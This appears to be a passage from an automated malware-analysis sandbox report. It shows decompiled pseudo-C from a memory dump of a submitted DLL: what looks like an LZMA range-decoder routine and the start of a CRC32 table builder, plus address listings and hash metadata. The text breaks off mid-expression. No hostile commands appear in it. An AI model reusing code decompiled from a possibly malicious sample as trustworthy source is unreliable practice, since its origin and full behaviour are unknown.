				signed int _t192;
				unsigned int _t198;
				signed char* _t199;
				signed int _t204;
				signed char* _t205;
				signed char* _t207;
				signed int _t213;
				signed short* _t214;
				signed int _t215;
				signed int _t222;
				signed char _t228;
				signed int _t229;
				signed int _t235;
				signed char* _t237;
				signed int _t240;
				signed int _t244;
				signed int _t247;
				signed int _t250;
				signed int _t253;
				signed int _t256;
				signed int _t259;
				signed char _t263;
				void* _t264;
				intOrPtr _t265;
				signed int _t267;
				signed char _t279;
				signed char _t284;
				signed int _t285;
				signed int _t286;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				signed char* _t297;
				intOrPtr _t298;
				signed char* _t299;
				signed short* _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed char* _t306;
				signed int _t309;
				signed int _t316;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t342;
				signed int _t343;
				signed char _t344;
				void* _t348;
				signed int _t349;

				_t297 = __ecx;
				_t342 =  *(__ecx + 0x40);
				_t288 =  *(__ecx + 0x20);
				_t323 =  *(__ecx + 0x24);
				_t158 =  *((intOrPtr*)(__ecx + 0xc));
				_v20 =  &(_a4[__eax]);
				_v16 = _t158;
				_t213 = ((0x00000001 <<  *(__ecx + 2)) - 0x00000001 &  *(__ecx + 0x28)) << 4;
				_t235 = 1 + _t342;
				_v4 = _t235;
				_v12 =  *(_t158 + _t235 * 2 - 0x200) & 0x0000ffff;
				if(_t288 >= 0x1000000) {
					L4:
					_t162 = (_t288 >> 0xb) * _v12;
					if(_t323 >= _t162) {
						_t298 = _v16;
						_t289 = _t288 - _t162;
						_t324 = _t323 - _t162;
						_v12 =  *(_t298 + 0x20 + _t342 * 2) & 0x0000ffff;
						_t237 = _a4;
						if(_t289 >= 0x1000000) {
							L39:
							_t165 = (_t289 >> 0xb) * _v12;
							if(_t324 >= _t165) {
								_t290 = _t289 - _t165;
								_t325 = _t324 - _t165;
								_t166 =  *(_t298 + 0x38 + _t342 * 2) & 0x0000ffff;
								_v8 = 3;
								if(_t290 >= 0x1000000) {
									L44:
									_t240 = (_t290 >> 0xb) * _t166;
									_t167 = _v16;
									if(_t325 >= _t240) {
										_t299 = _a4;
										_t291 = _t290 - _t240;
										_t326 = _t325 - _t240;
										_v12 =  *(_t167 + 0x50 + _t342 * 2) & 0x0000ffff;
										if(_t291 >= 0x1000000) {
											L55:
											_t244 = (_t291 >> 0xb) * _v12;
											if(_t326 >= _t244) {
												_t168 =  *(_t167 + 0x68 + _t342 * 2) & 0x0000ffff;
												_t292 = _t291 - _t244;
												_t325 = _t326 - _t244;
												if(_t292 >= 0x1000000) {
													L60:
													_t247 = (_t292 >> 0xb) * _t168;
													if(_t325 >= _t247) {
														goto L62;
													} else {
														_t293 = _t247;
													}
													goto L63;
												} else {
													if(_t299 >= _v20) {
														goto L2;
													} else {
														_t292 = _t292 << 8;
														_t325 = _t325 << 0x00000008 |  *_t299 & 0x000000ff;
														_a4 =  &(_t299[1]);
														goto L60;
													}
												}
											} else {
												_t293 = _t244;
												goto L63;
											}
										} else {
											if(_t299 >= _v20) {
												goto L2;
											} else {
												_t291 = _t291 << 8;
												_t326 = _t326 << 0x00000008 |  *_t299 & 0x000000ff;
												_t299 =  &(_t299[1]);
												_a4 = _t299;
												goto L55;
											}
										}
									} else {
										_t316 =  *(_t167 + _v4 * 2 - 0xc00) & 0x0000ffff;
										_t180 = _a4;
										_t292 = _t240;
										if(_t240 >= 0x1000000) {
											L48:
											_t247 = (_t292 >> 0xb) * _t316;
											if(_t325 >= _t247) {
												L62:
												_t293 = _t292 - _t247;
												_t325 = _t325 - _t247;
												L63:
												_t237 = _a4;
												_v4 = 0xc;
												_t301 = _v16 + 0xfffff600;
												goto L64;
											} else {
												if(_t247 >= 0x1000000 || _t180 < _v20) {
													return 3;
												} else {
													goto L2;
												}
											}
										} else {
											if(_t180 >= _v20) {
												goto L2;
											} else {
												_t292 = _t240 << 8;
												_t325 = _t325 << 0x00000008 |  *_t180 & 0x000000ff;
												_t180 =  &(_t180[1]);
												_a4 = _t180;
												goto L48;
											}
										}
									}
								} else {
									if(_t237 >= _v20) {
										goto L2;
									} else {
										_t290 = _t290 << 8;
										_t325 = _t325 << 0x00000008 |  *_t237 & 0x000000ff;
										_a4 =  &(_t237[1]);
										goto L44;
									}
								}
							} else {
								_t293 = _t165;
								_v4 = 0;
								_t301 = _t298 + 0xfffffa00;
								_v8 = 2;
								L64:
								_t169 =  *_t301 & 0x0000ffff;
								if(_t293 >= 0x1000000) {
									L67:
									_t250 = (_t293 >> 0xb) * _t169;
									_t170 = _a4;
									if(_t325 >= _t250) {
										_t343 = _t301[8] & 0x0000ffff;
										_t294 = _t293 - _t250;
										_t327 = _t325 - _t250;
										if(_t294 >= 0x1000000) {
											L72:
											_t253 = (_t294 >> 0xb) * _t343;
											if(_t327 >= _t253) {
												_t295 = _t294 - _t253;
												_t327 = _t327 - _t253;
												_t214 =  &(_t301[0x100]);
												_t344 = 0x10;
												_v12 = 0x100;
											} else {
												_t344 = 8;
												_t295 = _t253;
												_t214 = _t301 + 0x10 + _t213 * 2;
												_v12 = 8;
											}
											goto L75;
										} else {
											if(_t170 >= _v20) {
												goto L2;
											} else {
												_t294 = _t294 << 8;
												_t327 = _t327 << 0x00000008 |  *_t170 & 0x000000ff;
												_t170 =  &(_t170[1]);
												_a4 = _t170;
												goto L72;
											}
										}
									} else {
										_t295 = _t250;
										_t214 =  &(_t301[_t213]);
										_t344 = 0;
										_v12 = 8;
										L75:
										_t302 = 1;
										L76:
										while(1) {
											if(_t295 >= 0x1000000) {
												L79:
												_t256 = (_t295 >> 0xb) * (_t214[_t302] & 0x0000ffff);
												if(_t327 >= _t256) {
													_t295 = _t295 - _t256;
													_t327 = _t327 - _t256;
													_t302 = _t302 + _t302 + 1;
												} else {
													_t295 = _t256;
													_t302 = _t302 + _t302;
												}
												_t172 = _v12;
												if(_t302 >= _t172) {
													_t303 = _t302 + _t344 - _t172;
													if(_v4 >= 4) {
														goto L32;
													} else {
														if(_t303 >= 3) {
															_t303 = 3;
														}
														_t173 = _a4;
														_t129 = _t303 + 1; // 0x4
														_t348 = (_t129 << 7) + _v16;
														_t304 = 1;
														do {
															_t215 =  *(_t348 + _t304 * 2) & 0x0000ffff;
															if(_t295 >= 0x1000000) {
																goto L91;
															} else {
																_t176 = _a4;
																if(_t176 >= _v20) {
																	goto L2;
																} else {
																	_t295 = _t295 << 8;
																	_t327 = _t327 << 0x00000008 |  *_t176 & 0x000000ff;
																	_t173 =  &(_t176[1]);
																	_a4 = _t173;
																	goto L91;
																}
															}
															goto L113;
															L91:
															_t259 = (_t295 >> 0xb) * _t215;
															if(_t327 >= _t259) {
																_t295 = _t295 - _t259;
																_t327 = _t327 - _t259;
																_t304 = _t304 + _t304 + 1;
															} else {
																_t295 = _t259;
																_t304 = _t304 + _t304;
															}
														} while (_t304 < 0x40);
														_t305 = _t304 - 0x40;
														if(_t305 < 4) {
															goto L33;
														} else {
															_t263 = (_t305 >> 1) - 1;
															_v12 = _t263;
															if(_t305 >= 0xe) {
																_t306 = _v20;
																_t264 = _t263 - 4;
																do {
																	if(_t295 >= 0x1000000) {
																		goto L102;
																	} else {
																		if(_t173 >= _t306) {
																			goto L2;
																		} else {
																			_t295 = _t295 << 8;
																			_t327 = _t327 << 0x00000008 |  *_t173 & 0x000000ff;
																			_t173 =  &(_t173[1]);
																			goto L102;
																		}
																	}
																	goto L113;
																	L102:
																	_t295 = _t295 >> 1;
																	_t327 = _t327 - ((_t327 - _t295 >> 0x0000001f) - 0x00000001 & _t295);
																	_t264 = _t264 - 1;
																} while (_t264 != 0);
																_t265 = _v16;
																_a4 = _t173;
																_v12 = 4;
																goto L104;
															} else {
																_t265 = _v16 + ((_t305 & 0x00000001 | 0x00000002) << _t263) * 2 - 0xd00;
																L104:
																_t349 = 1;
																_v16 = _t265;
																_t222 = 1;
																do {
																	_t267 =  *(_v16 + _t349 * 2) & 0x0000ffff;
																	if(_t295 >= 0x1000000) {
																		goto L108;
																	} else {
																		if(_a4 >= _v20) {
																			goto L2;
																		} else {
																			_t178 = _a4;
																			_t295 = _t295 << 8;
																			_t327 = _t327 << 0x00000008 |  *_t178 & 0x000000ff;
																			_t173 =  &(_t178[1]);
																			_a4 = _t173;
																			goto L108;
																		}
																	}
																	goto L113;
																	L108:
																	_t309 = (_t295 >> 0xb) * _t267;
																	if(_t327 >= _t309) {
																		_t222 = _t222 + _t222;
																		_t295 = _t295 - _t309;
																		_t327 = _t327 - _t309;
																		_t349 = _t349 + _t222;
																	} else {
																		_t349 = _t349 + _t222;
																		_t295 = _t309;
																		_t222 = _t222 + _t222;
																	}
																	_t155 =  &_v12;
																	 *_t155 = _v12 - 1;
																} while ( *_t155 != 0);
																goto L33;
															}
														}
													}
												} else {
													_t170 = _a4;
													continue;
												}
											} else {
												if(_t170 >= _v20) {
													goto L2;
												} else {
													_t295 = _t295 << 8;
													_t327 = _t327 << 0x00000008 |  *_t170 & 0x000000ff;
													_a4 =  &(_t170[1]);
													goto L79;
												}
											}
											goto L113;
										}
									}
								} else {
									if(_t237 >= _v20) {
										goto L2;
									} else {
										_t293 = _t293 << 8;
										_t325 = _t325 << 0x00000008 |  *_t237 & 0x000000ff;
										_a4 =  &(_t237[1]);
										goto L67;
									}
								}
							}
						} else {
							if(_t237 >= _v20) {
								goto L2;
							} else {
								_t289 = _t289 << 8;
								_t324 = _t324 << 0x00000008 |  *_t237 & 0x000000ff;
								_t237 =  &(_t237[1]);
								_a4 = _t237;
								goto L39;
							}
						}
					} else {
						_t296 = _t162;
						_v16 = _v16 + 0x280;
						if(_t297[0x2c] != 0 || _t297[0x28] != 0) {
							_t279 = _t297[0x18];
							if(_t279 == 0) {
								_t279 = _t297[0x14];
							}
							_v16 = _v16 + ((( *(_t297[0x10] + _t279 - 1) & 0x000000ff) >> 8 - ( *_t297 & 0x000000ff)) + (((0x00000001 << _t297[1]) - 0x00000001 & _t297[0x28]) << ( *_t297 & 0x000000ff))) * 0x600;
						}
						if(_t342 >= 7) {
							_t284 = _t297[0x18];
							_t228 = _t297[0x30];
							if(_t284 >= _t228) {
								_t191 = 0;
							} else {
								_t191 = _t297[0x14];
							}
							_t229 =  *(_t297[0x10] - _t228 + _t284 + _t191) & 0x000000ff;
							_t321 = 0x100;
							_t285 = 1;
							do {
								_t192 = _t321;
								_t229 = _t229 + _t229;
								_v4 = _t192;
								_t321 = _t321 & _t229;
								_v12 =  *(_v16 + (_t192 + _t285 + _t321) * 2) & 0x0000ffff;
								if(_t296 >= 0x1000000) {
									goto L27;
								} else {
									_t199 = _a4;
									if(_t199 >= _v20) {
										goto L2;
									} else {
										_t296 = _t296 << 8;
										_t323 = _t323 << 0x00000008 |  *_t199 & 0x000000ff;
										_a4 =  &(_t199[1]);
										goto L27;
									}
								}
								goto L113;
								L27:
								_t198 = (_t296 >> 0xb) * _v12;
								if(_t323 >= _t198) {
									_t296 = _t296 - _t198;
									_t323 = _t323 - _t198;
									_t285 = _t285 + _t285 + 1;
								} else {
									_t285 = _t285 + _t285;
									_t321 = _t321 ^ _v4;
									_t296 = _t198;
								}
							} while (_t285 < 0x100);
							goto L31;
						} else {
							_t286 = 1;
							do {
								_t322 =  *(_v16 + _t286 * 2) & 0x0000ffff;
								if(_t296 >= 0x1000000) {
									goto L15;
								} else {
									_t205 = _a4;
									if(_t205 >= _v20) {
										goto L2;
									} else {
										_t296 = _t296 << 8;
										_t323 = _t323 << 0x00000008 |  *_t205 & 0x000000ff;
										_a4 =  &(_t205[1]);
										goto L15;
									}
								}
								goto L113;
								L15:
								_t204 = (_t296 >> 0xb) * _t322;
								if(_t323 >= _t204) {
									_t296 = _t296 - _t204;
									_t323 = _t323 - _t204;
									_t286 = _t286 + _t286 + 1;
								} else {
									_t296 = _t204;
									_t286 = _t286 + _t286;
								}
							} while (_t286 < 0x100);
							L31:
							_v8 = 1;
							L32:
							_t173 = _a4;
							L33:
							if(_t295 >= 0x1000000 || _t173 < _v20) {
								return _v8;
							} else {
								goto L2;
							}
						}
					}
				} else {
					_t207 = _a4;
					if(_t207 < _v20) {
						_t288 = _t288 << 8;
						_t323 = _t323 << 0x00000008 |  *_t207 & 0x000000ff;
						_a4 =  &(_t207[1]);
						goto L4;
					} else {
						L2:
						return 0;
					}
				}
				L113:
			}



















































































                                                  0x10042f77
                                                  0x10042f7d
                                                  0x10042f80
                                                  0x10042f83
                                                  0x10042f88
                                                  0x10042f8b
                                                  0x10042f99
                                                  0x10042fa3
                                                  0x10042fac
                                                  0x10042fb7
                                                  0x10042fbb
                                                  0x10042fbf
                                                  0x10042fe7
                                                  0x10042fec
                                                  0x10042ff3
                                                  0x10043175
                                                  0x1004317e
                                                  0x10043180
                                                  0x10043188
                                                  0x1004318c
                                                  0x10043190
                                                  0x100431ae
                                                  0x100431b3
                                                  0x100431ba
                                                  0x100431d9
                                                  0x100431db
                                                  0x100431e3
                                                  0x100431e8
                                                  0x100431f0
                                                  0x1004320e
                                                  0x10043213
                                                  0x10043218
                                                  0x1004321c
                                                  0x10043285
                                                  0x10043289
                                                  0x1004328b
                                                  0x10043298
                                                  0x1004329c
                                                  0x100432ba
                                                  0x100432bf
                                                  0x100432c6
                                                  0x100432cc
                                                  0x100432d1
                                                  0x100432d3
                                                  0x100432db
                                                  0x100432f9
                                                  0x100432fe
                                                  0x10043303
                                                  0x00000000
                                                  0x10043305
                                                  0x10043305
                                                  0x10043305
                                                  0x00000000
                                                  0x100432dd
                                                  0x100432e1
                                                  0x00000000
                                                  0x100432e7
                                                  0x100432ed
                                                  0x100432f0
                                                  0x100432f5
                                                  0x00000000
                                                  0x100432f5
                                                  0x100432e1
                                                  0x100432c8
                                                  0x100432c8
                                                  0x00000000
                                                  0x100432c8
                                                  0x1004329e
                                                  0x100432a2
                                                  0x00000000
                                                  0x100432a8
                                                  0x100432ae
                                                  0x100432b1
                                                  0x100432b3
                                                  0x100432b6
                                                  0x00000000
                                                  0x100432b6
                                                  0x100432a2
                                                  0x1004321e
                                                  0x10043228
                                                  0x10043230
                                                  0x10043234
                                                  0x10043236
                                                  0x10043256
                                                  0x1004325b
                                                  0x10043260
                                                  0x10043309
                                                  0x10043309
                                                  0x1004330b
                                                  0x1004330d
                                                  0x10043311
                                                  0x10043315
                                                  0x1004331d
                                                  0x00000000
                                                  0x10043266
                                                  0x1004326c
                                                  0x10043284
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x1004326c
                                                  0x10043238
                                                  0x1004323c
                                                  0x00000000
                                                  0x10043242
                                                  0x10043245
                                                  0x1004324d
                                                  0x1004324f
                                                  0x10043252
                                                  0x00000000
                                                  0x10043252
                                                  0x1004323c
                                                  0x10043236
                                                  0x100431f2
                                                  0x100431f6
                                                  0x00000000
                                                  0x100431fc
                                                  0x10043202
                                                  0x10043205
                                                  0x1004320a
                                                  0x00000000
                                                  0x1004320a
                                                  0x100431f6
                                                  0x100431bc
                                                  0x100431bc
                                                  0x100431be
                                                  0x100431c6
                                                  0x100431cc
                                                  0x10043323
                                                  0x10043329
                                                  0x1004332c
                                                  0x1004334a
                                                  0x1004334f
                                                  0x10043354
                                                  0x10043358
                                                  0x1004336b
                                                  0x1004336f
                                                  0x10043371
                                                  0x10043379
                                                  0x10043397
                                                  0x1004339c
                                                  0x100433a1
                                                  0x100433b4
                                                  0x100433b6
                                                  0x100433b8
                                                  0x100433be
                                                  0x100433c3
                                                  0x100433a3
                                                  0x100433a3
                                                  0x100433a8
                                                  0x100433aa
                                                  0x100433ae
                                                  0x100433ae
                                                  0x00000000
                                                  0x1004337b
                                                  0x1004337f
                                                  0x00000000
                                                  0x10043385
                                                  0x1004338b
                                                  0x1004338e
                                                  0x10043390
                                                  0x10043393
                                                  0x00000000
                                                  0x10043393
                                                  0x1004337f
                                                  0x1004335a
                                                  0x1004335a
                                                  0x1004335c
                                                  0x1004335f
                                                  0x10043361
                                                  0x100433cb
                                                  0x100433cb
                                                  0x00000000
                                                  0x100433d0
                                                  0x100433d6
                                                  0x100433f4
                                                  0x100433fd
                                                  0x10043402
                                                  0x1004340a
                                                  0x1004340c
                                                  0x1004340e
                                                  0x10043404
                                                  0x10043404
                                                  0x10043406
                                                  0x10043406
                                                  0x10043412
                                                  0x10043418
                                                  0x10043422
                                                  0x10043429
                                                  0x00000000
                                                  0x1004342f
                                                  0x10043432
                                                  0x10043434
                                                  0x10043434
                                                  0x10043439
                                                  0x1004343d
                                                  0x10043443
                                                  0x10043447
                                                  0x10043450
                                                  0x10043456
                                                  0x1004345b
                                                  0x00000000
                                                  0x1004345d
                                                  0x1004345d
                                                  0x10043465
                                                  0x00000000
                                                  0x1004346b
                                                  0x10043471
                                                  0x10043474
                                                  0x10043476
                                                  0x10043479
                                                  0x00000000
                                                  0x10043479
                                                  0x10043465
                                                  0x00000000
                                                  0x1004347d
                                                  0x10043482
                                                  0x10043487
                                                  0x1004348f
                                                  0x10043491
                                                  0x10043493
                                                  0x10043489
                                                  0x10043489
                                                  0x1004348b
                                                  0x1004348b
                                                  0x10043497
                                                  0x1004349c
                                                  0x100434a2
                                                  0x00000000
                                                  0x100434a8
                                                  0x100434ac
                                                  0x100434b2
                                                  0x100434b6
                                                  0x100434cd
                                                  0x100434d1
                                                  0x100434d4
                                                  0x100434da
                                                  0x00000000
                                                  0x100434dc
                                                  0x100434de
                                                  0x00000000
                                                  0x100434e4
                                                  0x100434ea
                                                  0x100434ed
                                                  0x100434ef
                                                  0x00000000
                                                  0x100434ef
                                                  0x100434de
                                                  0x00000000
                                                  0x100434f2
                                                  0x100434f2
                                                  0x10043500
                                                  0x10043502
                                                  0x10043502
                                                  0x10043507
                                                  0x1004350b
                                                  0x1004350f
                                                  0x00000000
                                                  0x100434b8
                                                  0x100434c4
                                                  0x10043517
                                                  0x10043517
                                                  0x1004351c
                                                  0x10043520
                                                  0x10043522
                                                  0x1004352c
                                                  0x10043530
                                                  0x00000000
                                                  0x10043532
                                                  0x1004353a
                                                  0x00000000
                                                  0x10043540
                                                  0x10043540
                                                  0x1004354a
                                                  0x1004354d
                                                  0x1004354f
                                                  0x10043552
                                                  0x00000000
                                                  0x10043552
                                                  0x1004353a
                                                  0x00000000
                                                  0x10043556
                                                  0x1004355b
                                                  0x10043560
                                                  0x1004356a
                                                  0x1004356c
                                                  0x1004356e
                                                  0x10043570
                                                  0x10043562
                                                  0x10043562
                                                  0x10043564
                                                  0x10043566
                                                  0x10043566
                                                  0x10043572
                                                  0x10043572
                                                  0x10043572
                                                  0x00000000
                                                  0x10043579
                                                  0x100434b6
                                                  0x100434a2
                                                  0x1004341a
                                                  0x1004341a
                                                  0x00000000
                                                  0x1004341a
                                                  0x100433d8
                                                  0x100433dc
                                                  0x00000000
                                                  0x100433e2
                                                  0x100433e8
                                                  0x100433eb
                                                  0x100433f0
                                                  0x00000000
                                                  0x100433f0
                                                  0x100433dc
                                                  0x00000000
                                                  0x100433d6
                                                  0x100433d0
                                                  0x1004332e
                                                  0x10043332
                                                  0x00000000
                                                  0x10043338
                                                  0x1004333e
                                                  0x10043341
                                                  0x10043346
                                                  0x00000000
                                                  0x10043346
                                                  0x10043332
                                                  0x1004332c
                                                  0x10043192
                                                  0x10043196
                                                  0x00000000
                                                  0x1004319c
                                                  0x100431a2
                                                  0x100431a5
                                                  0x100431a7
                                                  0x100431aa
                                                  0x00000000
                                                  0x100431aa
                                                  0x10043196
                                                  0x10042ff9
                                                  0x10042ff9
                                                  0x10043008
                                                  0x1004300c
                                                  0x10043014
                                                  0x10043019
                                                  0x1004301b
                                                  0x1004301b
                                                  0x1004304f
                                                  0x1004304f
                                                  0x10043056
                                                  0x100430b7
                                                  0x100430ba
                                                  0x100430bf
                                                  0x100430c6
                                                  0x100430c1
                                                  0x100430c1
                                                  0x100430c1
                                                  0x100430cf
                                                  0x100430d3
                                                  0x100430d8
                                                  0x100430e0
                                                  0x100430e4
                                                  0x100430e6
                                                  0x100430e8
                                                  0x100430ee
                                                  0x100430fd
                                                  0x10043101
                                                  0x00000000
                                                  0x10043103
                                                  0x10043103
                                                  0x1004310b
                                                  0x00000000
                                                  0x10043111
                                                  0x10043117
                                                  0x1004311a
                                                  0x1004311f
                                                  0x00000000
                                                  0x1004311f
                                                  0x1004310b
                                                  0x00000000
                                                  0x10043123
                                                  0x10043128
                                                  0x1004312f
                                                  0x1004313b
                                                  0x1004313d
                                                  0x1004313f
                                                  0x10043131
                                                  0x10043131
                                                  0x10043133
                                                  0x10043137
                                                  0x10043137
                                                  0x10043143
                                                  0x00000000
                                                  0x10043058
                                                  0x10043058
                                                  0x10043060
                                                  0x1004306a
                                                  0x1004306e
                                                  0x00000000
                                                  0x10043070
                                                  0x10043070
                                                  0x10043078
                                                  0x00000000
                                                  0x1004307e
                                                  0x10043084
                                                  0x10043087
                                                  0x1004308c
                                                  0x00000000
                                                  0x1004308c
                                                  0x10043078
                                                  0x00000000
                                                  0x10043090
                                                  0x10043095
                                                  0x1004309a
                                                  0x100430a2
                                                  0x100430a4
                                                  0x100430a6
                                                  0x1004309c
                                                  0x1004309c
                                                  0x1004309e
                                                  0x1004309e
                                                  0x100430aa
                                                  0x1004314b
                                                  0x1004314b
                                                  0x10043153
                                                  0x10043153
                                                  0x10043157
                                                  0x1004315d
                                                  0x10043174
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x1004315d
                                                  0x10043056
                                                  0x10042fc1
                                                  0x10042fc1
                                                  0x10042fc9
                                                  0x10042fdb
                                                  0x10042fde
                                                  0x10042fe3
                                                  0x00000000
                                                  0x10042fce
                                                  0x10042fce
                                                  0x10042fd4
                                                  0x10042fd4
                                                  0x10042fc9
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e0856241cb6bbf71926997529d1bf78259062796160ea0e3547fab56752f16d4
                                                  • Instruction ID: 716e8680d2defe3bfc55e8fd9abbacc65e697d5aafa8aa152ded289f5cb66b27
                                                  • Opcode Fuzzy Hash: e0856241cb6bbf71926997529d1bf78259062796160ea0e3547fab56752f16d4
                                                  • Instruction Fuzzy Hash: B5024632A083518BD709CE28C49425DBBE2FBC4344F264B3DE896D7B94D774E988CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10040780, Relevance: .1, Instructions: 96COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E10040780() {
				void* __esi;
				void* _t43;
				void* _t45;
				signed int _t71;
				unsigned int _t83;
				void* _t84;

				_t83 = 0;
				do {
					 *(0x104060e0 + _t83 * 4) =  ~(( ~(( ~(( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 